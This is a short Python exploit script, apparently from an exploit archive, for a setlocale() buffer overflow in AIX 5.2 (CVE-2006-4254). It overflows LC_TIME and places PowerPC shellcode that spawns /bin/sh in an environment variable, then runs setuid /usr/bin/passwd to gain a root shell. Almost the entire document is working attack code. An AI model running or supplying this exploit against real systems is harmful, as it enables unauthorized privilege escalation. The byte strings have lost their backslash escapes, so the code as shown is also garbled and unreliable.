No description provided by source.
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#[email protected]
#
from os import execve
bof="a"*580+"bbbbccccddddx2fxf2x28x2f"
egg="x60"*2350
shellcode=( # by intropy <at> caughq.org
"x7cxa5x2ax79" # xor. r5,r5,r5
"x40x82xffxfd" # bnel <shellcode>
"x7fxe8x02xa6" # mflr r31
"x3bxffx01x20" # cal r31,0x120(r31)
"x38x7fxffx08" # cal r3,-248(r31)
"x38x9fxffx10" # cal r4,-240(r31)
"x90x7fxffx10" # st r3,-240(r31)
"x90xbfxffx14" # st r5,-236(r31)
"x88x5fxffx0f" # lbz r2,-241(r31)
"x98xbfxffx0f" # stb r5,-241(r31)
"x4cxc6x33x42" # crorc cr6,cr6,cr6
"x44xffxffx02" # svca
"/bin/sh"
"x05")
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})
# sebug.net